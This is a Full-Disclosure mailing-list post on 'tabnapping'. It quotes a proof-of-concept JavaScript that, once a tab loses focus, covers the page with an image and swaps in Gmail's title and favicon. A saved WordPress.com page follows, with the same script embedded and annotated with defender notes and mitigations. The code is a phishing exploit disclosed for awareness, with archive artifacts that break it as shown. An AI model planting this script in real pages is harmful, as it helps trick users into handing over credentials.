
[Full-disclosure] tabnapping



I just stumbled across this (credit goes to
http://www.pjlantz.com/2010/05/tabnapping.html and Aza Raskin), and while
it is rough, it certainly has potential given the right circumstances.

I added a quick PoC. I'm behind a NAT and can't provide you a working
link at the moment, but it seemed to work fine using the latest Fennec beta.
That being said, it also worked on my box using a variety of user agents, so
I'm not certain this is even a mobile-specific problem.

The malicious script is as follows:

>
> /*
> Copyright (c) 2010 Aza Raskin
> http://azarask.in
>
> Permission is hereby granted, free of charge, to any person
> obtaining a copy of this software and associated documentation
> files (the "Software"), to deal in the Software without
> restriction, including without limitation the rights to use,
> copy, modify, merge, publish, distribute, sublicense, and/or sell
> copies of the Software, and to permit persons to whom the
> Software is furnished to do so, subject to the following
> conditions:
>
> The above copyright notice and this permission notice shall be
> included in all copies or substantial portions of the Software.
> */
>
>
> (function(){
>
> var TIMER = null;
> var HAS_SWITCHED = false;
>
> // Events
> window.onblur = function(){
>   TIMER = setTimeout(changeItUp, 5000);
> }
>
> window.onfocus = function(){
>   if(TIMER) clearTimeout(TIMER);
> }
>
> // Utils
> function setTitle(text){ document.title = text; }
>
> // This favicon object rewritten from:
> // Favicon.js - Change favicon dynamically [http://ajaxify.com/run/favicon].
> // Copyright (c) 2008 Michael Mahemoff. Icon updates only work in Firefox and Opera.
>
> favicon = {
>   docHead: document.getElementsByTagName("head")[0],
>   set: function(url){
>     this.addLink(url);
>   },
>
>   addLink: function(iconURL) {
>     var link = document.createElement("link");
>     link.type = "image/x-icon";
>     link.rel = "shortcut icon";
>     link.href = iconURL;
>     this.removeLinkIfExists();
>     this.docHead.appendChild(link);
>   },
>
>   removeLinkIfExists: function() {
>     var links = this.docHead.getElementsByTagName("link");
>     for (var i=0; i<links.length; i++) {
>       var link = links[i];
>       if (link.type=="image/x-icon" && link.rel=="shortcut icon") {
>         this.docHead.removeChild(link);
>         return; // Assuming only one match at most.
>       }
>     }
>   },
>
>   get: function() {
>     var links = this.docHead.getElementsByTagName("link");
>     for (var i=0; i<links.length; i++) {
>       var link = links[i];
>       if (link.type=="image/x-icon" && link.rel=="shortcut icon") {
>         return link.href;
>       }
>     }
>   }
> };
>
>
> function createShield(){
>   div = document.createElement("div");
>   div.style.position = "fixed";
>   div.style.top = 0;
>   div.style.left = 0;
>   div.style.backgroundColor = "white";
>   div.style.width = "100%";
>   div.style.height = "100%";
>   div.style.textAlign = "center";
>   document.body.style.overflow = "hidden";
>
>   img = document.createElement("img");
>   img.style.paddingTop = "15px";
>   img.src = "http://img.skitch.com/20100524-b639xgwegpdej3cepch2387ene.png
";
>
>   var oldTitle = document.title;
>   var oldFavicon = favicon.get() || "/favicon.ico";
>
>   div.appendChild(img);
>   document.body.appendChild(div);
>   img.onclick = function(){
>     div.parentNode.removeChild(div);
>     document.body.style.overflow = "auto";
>     setTitle(oldTitle);
>     favicon.set(oldFavicon)
>   }
>
>
> }
>
> function changeItUp(){
>   if( HAS_SWITCHED == false ){
>     createShield("https://mail.google.com";);
>     setTitle( "Gmail: Email from Google");
>     favicon.set("https://mail.google.com/favicon.ico";);
>     HAS_SWITCHED = true;
>   }
> }
>
>
> })();
<!DOCTYPE html>
<html dir="ltr" lang="en">
<!--
        generated 176 seconds ago
        generated in 0.289 seconds
        served from batcache in 0.002 seconds
        expires in 124 seconds
-->
<head>
        <meta charset="UTF-8" />
        <title>Learn WordPress.com</title>
        <link rel="profile" href="http://gmpg.org/xfn/11"; />
                <link rel="pingback" 
href="http://learn.wordpress.com/xmlrpc.php"; />
        <link rel="alternate" type="application/rss+xml" title="Learn 
WordPress.com &raquo; Feed" href="http://learn.wordpress.com/feed/"; />
<link rel="alternate" type="application/rss+xml" title="Learn WordPress.com 
&raquo; Comments Feed" href="http://learn.wordpress.com/comments/feed/"; />
<script type="text/javascript">
/* <![CDATA[ */
// Registers `func` as a window load handler without discarding a handler
// that is already installed on window.onload.
function addLoadEvent(func) {
  var previous = window.onload;
  if (typeof window.onload == 'function') {
    // A handler already exists: chain it so the earlier one runs first.
    window.onload = function () {
      previous();
      func();
    };
    return;
  }
  // Nothing installed yet: `func` becomes the load handler directly.
  window.onload = func;
}
/* ]]> */
</script>
<link rel="stylesheet" 
href="http://s0.wp.com/wp-content/themes/h4/global.css?m=1297799136g"; 
type="text/css" />
<link rel='stylesheet' id='main-css'  
href='http://s0.wp.com/wp-content/themes/vip/wpcomlearn/style.css?m=1306351555g&#038;ver=MU'
 type='text/css' media='screen' />
<link rel='stylesheet' id='print-css'  
href='http://s0.wp.com/wp-content/themes/vip/wpcomlearn/print.css?m=1293711544g&#038;ver=MU'
 type='text/css' media='print' />
<link rel='stylesheet' id='sharedaddy-css'  
href='http://s2.wp.com/wp-content/mu-plugins/sharing/sharing.css?m=1307113418g&#038;ver=MU'
 type='text/css' media='all' />
<script type='text/javascript' 
src='http://s2.wp.com/wp-includes/js/l10n.js?m=1295648996g&amp;ver=20101110'></script>
<script type='text/javascript' 
src='http://s0.wp.com/wp-includes/js/jquery/jquery.js?m=1305825971g&amp;ver=1.6.1'></script>
<script type='text/javascript' 
src='http://s0.wp.com/wp-includes/js/comment-reply.js?m=1293711305g&amp;ver=20090102'></script>
<link rel='stylesheet' id='highlander-comments-css'  
href='http://s0.wp.com/wp-content/mu-plugins/highlander-comments/style.css?m=1307475598g&#038;ver=20110606'
 type='text/css' media='all' />
<!--[if lt IE 8]>
<link rel='stylesheet' id='highlander-comments-ie7-css'  
href='http://s0.wp.com/wp-content/mu-plugins/highlander-comments/style-ie7.css?m=1307172283g&#038;ver=20110606'
 type='text/css' media='all' />
<![endif]-->
<link rel="EditURI" type="application/rsd+xml" title="RSD" 
href="http://learn.wordpress.com/xmlrpc.php?rsd"; />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" 
href="http://learn.wordpress.com/wp-includes/wlwmanifest.xml"; /> 
<link rel='index' title='Learn WordPress.com' 
href='http://learn.wordpress.com/' />
<link rel='next' title='Get&nbsp;Started' 
href='http://learn.wordpress.com/get-started/' />
<meta name="generator" content="WordPress.com" />
<link rel='canonical' href='http://learn.wordpress.com/' />
<link rel='shortlink' href='http://wp.me/P4gm-2' />
<link rel="shortcut icon" type="image/x-icon" 
href="http://s1.wp.com/i/favicon-stacked.ico?m=1293711297g"; sizes="16x16 24x24 
32x32 48x48" />
<link rel="icon" type="image/x-icon" 
href="http://s1.wp.com/i/favicon-stacked.ico?m=1293711297g"; sizes="16x16 24x24 
32x32 48x48" />
<link rel="apple-touch-icon" 
href="http://s0.wp.com/wp-content/themes/h4/i/webclip.png?m=1293711355g"; />
        <style type="text/css">
        /* <![CDATA[ */
                                div#likes { margin-top: 15px; }
                .like-button { border: 1px solid #eee; padding: 2px 6px; 
font-size: 13px; font-family: arial, tahoma, sans-serif; }
                #wpl-likebox { clear: left; font-size: 11px; font-family: 
arial, tahoma, verdana, sans-serif !important; min-height: 30px; margin: 10px 0 
!important; padding: 5px 0 10px 0 !important; }
                #wpl-button { float: left; background: url( 
http://s2.wp.com/i/buttonbg.png ) top left repeat-x; margin-right: 7px; border: 
1px solid #d4d4d4; -moz-border-radius: 3px; -webkit-border-radius: 3px; 
border-radius: 3px; }
                #wpl-button a { border-bottom: none !important; color: #666 
!important; line-height: 130% !important; text-decoration: none !important; 
outline: none; float: left; padding: 3px 6px 2px 24px !important; font-size: 
11px !important; background: url( http://s1.wp.com/i/likestar.png ) 6px 49.8% 
no-repeat; }
                #wpl-button a:hover { border-bottom: none !important; }
                #wpl-button.liked { background: #feffce; border: 1px solid 
#f3e389; }
                #wpl-button.liked a { color: #ba871b !important; }
                #wpl-likebox #wpl-count { min-height: 25px; line-height: 130% 
!important; float: left; padding-top: 4px; }
                #wpl-likebox #wpl-avatars { clear: left; max-height: 98px; 
overflow: hidden; margin-top: 15px; line-height: 130% !important; }
                #wpl-likebox #wpl-avatars img { border: none !important; }
                #wpl-likebox #wpl-mustlogin { line-height: 14px !important; 
font-size: 11px; clear: left; margin-top: 5px; background: #f0f0f0; padding: 
10px; width: 65%; -moz-border-radius: 3px; -webkit-border-radius: 3px; 
border-radius: 3px; }
                #wpl-likebox #wpl-mustlogin a { color: #888; text-decoration: 
underline; }
                #wpl-likebox #wpl-mustlogin p { margin: 5px 0; padding: 0 }
                #wpl-likebox #wpl-mustlogin input.input { padding: 2px; 
background: #fff; font-size: 11px; font-family: inherit; border: 1px solid 
#ccc; -moz-box-shadow: 1px 1px 1px rgba(0, 0, 0, 0.1) inset; 
-webkit-box-shadow: 1px 1px 1px rgba(0, 0, 0, 0.1) inset; line-height: 12px; }
                #wpl-likebox #wpl-mustlogin input#wp-submit { border: 1px solid 
#ccc; font-size: 11px; background: #fafafa; repeat-x; -moz-border-radius: 3px; 
-webkit-border-radius: 3px; border-radius: 3px; padding: 2px 4px !important; 
line-height: 12px; }
                #wpl-likebox #wpl-mustlogin label { position: relative; cursor: 
text; }
                #wpl-likebox #wpl-mustlogin label span { position: absolute; 
top: 0px; left: 5px; padding: 0 !important; }
                #wpl-likebox #wpl-mustlogin label span { top /*\**/: -10px\9; }
        /* ]]> */
        </style>
        <link rel='openid.server' 
href='http://learn.wordpress.com/?openidserver=1' />
<link rel='openid.delegate' href='http://learn.wordpress.com/' />
<link rel="search" type="application/opensearchdescription+xml" 
href="http://learn.wordpress.com/osd.xml"; title="Learn WordPress.com" />
<link rel="search" type="application/opensearchdescription+xml" 
href="http://wordpress.com/opensearch.xml"; title="WordPress.com" />
<meta name="application-name" content="Learn WordPress.com" /><meta 
name="msapplication-window" content="width=device-width;height=device-height" 
/><meta name="msapplication-task" 
content="name=Subscribe;action-uri=http://learn.wordpress.com/feed/;icon-uri=http://s1.wp.com/i/favicon-stacked.ico";
 /><meta name="msapplication-task" content="name=Sign up for a free 
blog;action-uri=http://wordpress.com/signup/;icon-uri=http://s2.wp.com/i/favicon.ico";
 /><meta name="msapplication-task" content="name=WordPress.com 
Support;action-uri=http://support.wordpress.com/;icon-uri=http://s2.wp.com/i/favicon.ico";
 /><meta name="msapplication-task" content="name=WordPress.com 
Forums;action-uri=http://forums.wordpress.com/;icon-uri=http://s2.wp.com/i/favicon.ico";
 /></head>

<body class="home page page-id-2 highlander-enabled highlander-light">
<div id="page" class="hfeed">
        <header id="branding">
                        <h1 id="site-title"><span><a 
href="http://learn.wordpress.com/"; title="Learn WordPress.com" rel="home"><img 
src="http://s0.wp.com/wp-content/themes/vip/wpcomlearn/i/logo.png?m=1306351555g";
 alt="Learn WordPress.com" /></a></span></h1>
        </header><!-- #branding -->
        
        <div id="main">
                        <div id="access">
                                <div class="skip-link screen-reader-text"><a 
href="#content" title="Skip to content">Skip to content</a></div>

                                    <form id="searchform" name="searchform" 
method="get" action="http://learn.wordpress.com";>
                                                <div>
                                                        <label 
for="s">Search</label>
                                                        <input type="search" 
id="s" name="s" />
                                                        <input type="submit" 
id="searchsubmit" value="Search" />
                                                </div>
                                </form>

                                <ul><li><a href="http://learn.wordpress.com/"; 
title="Home">Home<br /><span class="subtitle">Where the heart 
is</span></a></li><li><a href="http://learn.wordpress.com/get-started/"; 
title="Get Started">Get Started<br /><span class="subtitle">Register with 
WordPress.com</span></a></li><li><a 
href="http://learn.wordpress.com/get-focused/"; title="Get Focused">Get 
Focused<br /><span class="subtitle">Choose Your Topic</span></a></li><li><a 
href="http://learn.wordpress.com/get-customized/"; title="Get Customized">Get 
Customized<br /><span class="subtitle">Personalize Your Site’s 
Appearance</span></a></li><li><a 
href="http://learn.wordpress.com/get-published/"; title="Get Published">Get 
Published<br /><span class="subtitle">Create Your First 
Post</span></a></li><li><a href="http://learn.wordpress.com/get-flashy/"; 
title="Get Flashy">Get Flashy<br /><span class="subtitle">Add Images and 
Video</span></a></li><li><a href="http://learn.wordpress.com/get-connected/"; 
title="Get Connected">Get Connected<br /><span class="subtitle">Meet Others in 
the Community</span></a></li><li><a 
href="http://learn.wordpress.com/get-famous/"; title="Get Famous">Get Famous<br 
/><span class="subtitle">Boost Your Readership</span></a></li><li><a 
href="http://learn.wordpress.com/get-mobile/"; title="Get Mobile">Get Mobile<br 
/><span class="subtitle">Blog on the Go</span></a></li><li><a 
href="http://learn.wordpress.com/get-heroic/"; title="Get Heroic">Get Heroic<br 
/><span class="subtitle">Become a WordPress.com Pro</span></a></li></ul>
                        </div><!-- #access -->

                <div id="primary">
                        <div id="content">
                        <h1>From Zero to&nbsp;Hero</h1>
                        <h2 class="subtitle">Where the heart is</h2>            
                <article id="post-2" class="post-2 page type-page 
status-publish hentry">
                                        <div class="entry-content">
        <p>&nbsp;</p>
<p><img class="alignnone size-full wp-image-3143" title="Illustration of the 
taking the fast lane crop" 
src="http://learn.files.wordpress.com/2009/11/illustration-of-the-taking-the-fast-lane-crop.jpg?w=640&#038;h=185";
 alt="" width="640" height="185" /></p>
<p>Always wanted to be a blogging superstar? Or simply want to learn your way 
around WordPress.com?</p>
<p>You&#8217;ve come to the right place. Go from blogging zero to blogging hero 
in 10 quick levels.</p>
<p>Let&#8217;s <strong><a href="http://learn.wordpress.com/get-started/";>Get 
Started. »</a><br />
</strong>
<div class="snap_nopreview sharing robots-nocontent">
<ul>
<li class="sharing_label">Share this:</li>
<li class="share-email share-regular"><a rel="nofollow" class="share-email 
share-icon no-text" href="http://learn.wordpress.com/?share=email"; 
target="_blank" title="Click to email this to a friend"></a></li>
<li class="share-facebook share-regular"><a rel="nofollow" 
class="share-facebook share-icon no-text" 
href="http://learn.wordpress.com/?share=facebook"; target="_blank" title="Share 
on Facebook"></a></li>
<li class="share-twitter share-regular"><a rel="nofollow" class="share-twitter 
share-icon no-text" href="http://learn.wordpress.com/?share=twitter"; 
target="_blank" title="Click to share on Twitter"></a></li>
<li class="share-linkedin share-regular"><a rel="nofollow" 
class="share-linkedin share-icon no-text" 
href="http://learn.wordpress.com/?share=linkedin"; target="_blank" title="Click 
to share on LinkedIn"></a></li>
<li class="share-print share-regular"><a rel="nofollow" class="share-print 
share-icon no-text" href="http://learn.wordpress.com/#print"; target="_blank" 
title="Click to print"></a></li>
<li class="share-custom"><a href="#" class="sharing-anchor">Share</a></li>
<li class="share-end"></li>
</ul>
<div class="sharing-hidden">
<div class="inner" style="display: none;">
<ul>
<li class="share-stumbleupon"><a rel="nofollow" class="share-stumbleupon 
share-icon no-text" href="http://learn.wordpress.com/?share=stumbleupon"; 
target="_blank" title="Click to share on StumbleUpon"></a></li>
<li class="share-digg"><a rel="nofollow" class="share-digg share-icon no-text" 
href="http://learn.wordpress.com/?share=digg"; target="_blank" title="Click to 
Digg this post"></a></li>
<li class="share-end"></li>
<li class="share-reddit"><a rel="nofollow" class="share-reddit share-icon 
no-text" href="http://learn.wordpress.com/?share=reddit"; target="_blank" 
title="Click to share on Reddit"></a></li>
<li class="share-end"></li>
</ul>
</div>
</div>
<div class="sharing-clear"></div>
</div>
                                                        </div><!-- 
.entry-content -->
                                </article><!-- #post-2 -->
                        </div><!-- #content -->
                </div><!-- #primary -->
                <div class="clear"></div>
        </div><!-- #main -->
        <div id="colophon">
                <div class="feedback">
                <a href="http://support.wordpress.com";>Need Help? Get answers 
from Support</a>
                <a href="/feedback/">Questions, comments? Send us feedback.</a> 
                <a href="http://learn.wordpress.com/?print=true";>Print this 
Guide</a>
        </div>
<ul class="resources">

        <li id="linkcat-1784" class="linkcat snap_preview"><h2>Resources</h2>
        <ul class='snap_preview xoxo blogroll'>
<li><a href="http://wordpress.com/?ref=footer"; rel="generator">Blog at 
WordPress.com</a>.</li>
<li><a href="http://support.wordpress.com";>WordPress.com Support</a></li>
<li><a href="http://wordpress.tv";>WordPress.tv</a></li>

        </ul>
</li>
 
</ul>
                        <p class="automattic"><span>An <a 
href="http://automattic.com/";><img 
src="http://s.wordpress.com/wp-content/themes/h4/i/automattic.png?1"; 
alt="Automattic" width="102" height="9" /></a> Ruckus</span></p>

        </div><!-- #colophon -->
</div><!-- #page -->
<script type="text/javascript">
// <![CDATA[
(function () {
  // Injects the jump-list script only when window.external exposes
  // msIsSiteMode and it returns true. Any exception is swallowed, so a
  // failure here never affects the rest of the page.
  try {
    if (!(window.external && 'msIsSiteMode' in window.external)) {
      return;
    }
    if (!window.external.msIsSiteMode()) {
      return;
    }
    var loader = document.createElement('script');
    loader.type = 'text/javascript';
    loader.async = true;
    loader.src = '/wp-content/plugins/ie-sitemode/custom-jumplist.php';
    // Insert ahead of the first script element already in the document.
    var firstScript = document.getElementsByTagName('script')[0];
    firstScript.parentNode.insertBefore(loader, firstScript);
  } catch (e) {}
})();
// ]]>
</script><script 
type="text/javascript">_qoptions={qacct:'p-18-mFEk4J448M',labels:'language.en,type.wpcom'};</script>
<script type="text/javascript" 
src="http://edge.quantserve.com/quant.js";></script>
<noscript><p><img class="robots-nocontent" 
src="http://pixel.quantserve.com/pixel/p-18-mFEk4J448M.gif?labels=language.en%2Ctype.wpcom";
 style="display:none" height="1" width="1" alt="" /></p></noscript>
<script type='text/javascript' 
src='http://s.gravatar.com/js/gprofiles.js?v&#038;ver=MU'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var WPGroHo = {
        my_hash: ""
};
/* ]]> */
</script>
<script type='text/javascript' 
src='http://s2.wp.com/wp-content/mu-plugins/gravatar-hovercards/wpgroho.js?m=1298424233g&amp;ver=MU'></script>
        <div style="display:none">
        </div>
<script type='text/javascript'>
/* <![CDATA[ */
var HighlanderComments = {
        loggingInText: "Logging In&hellip;",
        submittingText: "Posting Comment&hellip;",
        postCommentText: "Post Comment",
        connectingToText: "Connecting to %s",
        commentingAsText: "Posting comment as:",
        ofWPcomText: "%s of WordPress.com",
        logoutText: "Log Out",
        loginText: "Log In",
        connectURL: 
"http://learn.wordpress.com/public.api/connect/?action=request";,
        homeURL: "http://learn.wordpress.com/";,
        postID: "2",
        gravDefault: "identicon",
        enterACommentError: "Please enter a comment",
        enterEmailError: "Email address required",
        enterAuthorError: "Name required"
};
/* ]]> */
</script>
<script type='text/javascript' 
src='http://s1.wp.com/wp-content/mu-plugins/highlander-comments/script.js?m=1307164145g&amp;ver=20110606'></script>
<script type='text/javascript' 
src='http://s2.wp.com/wp-content/mu-plugins/sharing/sharing.js?m=1305927510g&amp;ver=0.2'></script>
        <div id="sharing_email" style="display: none;">
                <form action="" method="post">
                        <label for="target_email">Send to Email Address</label>
                        <input type="text" name="target_email" 
id="target_email" value="" />
                        
                        
                                <label for="source_name">Your Name</label>
                                <input type="text" name="source_name" 
id="source_name" value="" />
                                
                                <label for="source_email">Your Email 
Address</label>
                                <input type="text" name="source_email" 
id="source_email" value="" />

                                                
                        <div class="recaptcha" id="sharing_recaptcha"></div>
                        <img style="float: right; display: none" 
class="loading" 
src="http://learn.wordpress.com/wp-content/mu-plugins/sharing/images/loading.gif";
 alt="loading" width="16" height="16" />
                        <input type="submit" value="Send Email" 
class="sharing_send" />
                        <a href="#cancel" class="sharing_cancel">Cancel</a>
                        
                        <div class="errors errors-1" style="display: none;">
                                Post was not sent - check your email addresses! 
                </div>

                        <div class="errors errors-2" style="display: none;">
                                Email check failed, please try again            
        </div>
                        
                        <div class="errors errors-3" style="display: none;">
                                Sorry, your blog cannot share posts by email.   
                </div>
                </form>
        </div>
<script type="text/javascript" 
src="http://b.scorecardresearch.com/beacon.js";></script><script 
type="text/javascript">try{COMSCORE.beacon({c1:2,c2:7518284});}catch(e){}</script><noscript><p
 class="robots-nocontent"><img 
src="http://b.scorecardresearch.com/p?cj=1c1=2&#038;c2=7518284"; alt="" 
style="display:none" width="1" height="1" /></p></noscript><script 
src="http://s.stats.wordpress.com/w.js?19"; type="text/javascript"></script>
<script type="text/javascript">
st_go({'blog':'16390','v':'wpcom','user_id':'0','post':'2','subd':'learn'});
ex_go({'crypt':'UE40eW5QN0p8M2Y/RE1lSiYrZXhzUkM5fD1uTDNLUGt6QzVbd3FKb3Q4aWxUTWElWmU0VDYxaVE9SkFJTUhDVT9WUFNZVFNkW2xSK2RvOHYyY2tMY2dLbUZzRFBzcnx5VFkvQ1VXVV85Qkg4YlslNi1GbXYsOS1hZVguS0s0NXd0YTkuLmFxb0dNXTZobTZOQ01XODNqd3RJPUQmVjJPZ2VYODhBVSZYUWh4TkYuWy8wTl18U0psSnFbaF85dHN4ZU9m'});
addLoadEvent(function(){linktracker_init('16390',2);});
        </script>
<script type="text/javascript">
/*
 * Proof-of-concept "tabnapping" script (the copy quoted earlier on this page
 * carries an Aza Raskin copyright notice). Once the window has been out of
 * focus for 5 seconds it covers the page with a full-viewport image and swaps
 * the tab title and favicon to Gmail's.
 *
 * Defender notes:
 *  - Nothing in this listing navigates or changes the URL, so the address bar
 *    keeps showing the hosting page's origin. The title and favicon are fully
 *    page-controlled and are not an identity signal.
 *  - The overlay is a static image; clicking it removes the overlay and
 *    restores the title and favicon. This listing collects no input.
 *  - General mitigations (not derived from this listing): origin-bound
 *    credentials such as password-manager autofill or WebAuthn are tied to
 *    the real origin, and a Content-Security-Policy that limits script
 *    sources reduces the chance of a script like this being injected into a
 *    legitimate page.
 *  - NOTE(review): as archived, the listing is not valid JavaScript. The bare
 *    "Opera." line and the `;` following the URLs inside the calls in
 *    changeItUp appear to be mail-archive artifacts.
 */
(function(){

var TIMER = null;          // handle of the pending setTimeout, set on blur
var HAS_SWITCHED = false;  // one-shot latch: the swap happens at most once

// Events
// Losing focus starts a 5000 ms countdown to the swap.
window.onblur = function(){
  TIMER = setTimeout(changeItUp, 5000);
}  

// Regaining focus cancels a pending countdown (TIMER is not reset to null).
window.onfocus = function(){
  if(TIMER) clearTimeout(TIMER);
}

// Utils
// Overwrites the tab title.
function setTitle(text){ document.title = text; }

// This favicon object rewritten from:
// Favicon.js - Change favicon dynamically [http://ajaxify.com/run/favicon].
// Copyright (c) 2008 Michael Mahemoff. Icon updates only work in Firefox and 
Opera.
// NOTE(review): "Opera." above looks like the wrapped tail of the preceding
// comment line (archive line-wrap), not intended code.

// Assigned without `var`, so presumably an implicit global in the original.
favicon = {
  docHead: document.getElementsByTagName("head")[0],
  // Replaces the page's favicon with the icon at `url`.
  set: function(url){
    this.addLink(url);
  },
  
  // Builds a new <link rel="shortcut icon">, removes the existing one (if
  // any) and appends the new element to <head>.
  addLink: function(iconURL) {
    var link = document.createElement("link");
    link.type = "image/x-icon";
    link.rel = "shortcut icon";
    link.href = iconURL;
    this.removeLinkIfExists();
    this.docHead.appendChild(link);
  },

  // Removes the first <link> in <head> whose type and rel match the favicon
  // pattern; later matches are left in place.
  removeLinkIfExists: function() {
    var links = this.docHead.getElementsByTagName("link");
    for (var i=0; i<links.length; i++) {
      var link = links[i];
      if (link.type=="image/x-icon" && link.rel=="shortcut icon") {
        this.docHead.removeChild(link);
        return; // Assuming only one match at most.
      }
    }
  },
  
  // Returns the href of the first matching favicon <link>; falls off the end
  // (undefined) when there is none.
  get: function() {
    var links = this.docHead.getElementsByTagName("link");
    for (var i=0; i<links.length; i++) {
      var link = links[i];
      if (link.type=="image/x-icon" && link.rel=="shortcut icon") {
        return link.href;
      }
    }
  }  
};  


// Covers the viewport with a white, fixed-position <div> holding a single
// image and disables page scrolling. Declared with no parameters, so the
// argument passed by changeItUp is ignored. `div` and `img` are assigned
// without `var`.
function createShield(){
  div = document.createElement("div");
  div.style.position = "fixed";
  div.style.top = 0;
  div.style.left = 0;
  div.style.backgroundColor = "white";
  div.style.width = "100%";
  div.style.height = "100%";
  div.style.textAlign = "center";
  document.body.style.overflow = "hidden";
  
  img = document.createElement("img");
  img.style.paddingTop = "15px";
  // Remote image fetched over plain http; presumably a screenshot matching
  // the spoofed title. TODO confirm, the image itself is not part of this page.
  img.src = "http://img.skitch.com/20100524-b639xgwegpdej3cepch2387ene.png";;
  
  // Captured before the swap so the click handler can undo it. Falls back to
  // "/favicon.ico" when no favicon <link> is found.
  var oldTitle = document.title;
  var oldFavicon = favicon.get() || "/favicon.ico";
  
  div.appendChild(img);
  document.body.appendChild(div);
  // Clicking the image removes the overlay, re-enables scrolling and
  // restores the original title and favicon.
  img.onclick = function(){
    div.parentNode.removeChild(div);
    document.body.style.overflow = "auto";
    setTitle(oldTitle);  
    favicon.set(oldFavicon)
  }
  

}

// Timer callback: performs the swap once. createShield() runs first so that
// it records the original title and favicon before they are overwritten.
function changeItUp(){
  if( HAS_SWITCHED == false ){
    createShield("https://mail.google.com";);
    setTitle( "Gmail: Email from Google");    
    favicon.set("https://mail.google.com/favicon.ico";);
    HAS_SWITCHED = true;    
  }
}
  
  
})();
</script>
</body>
</html>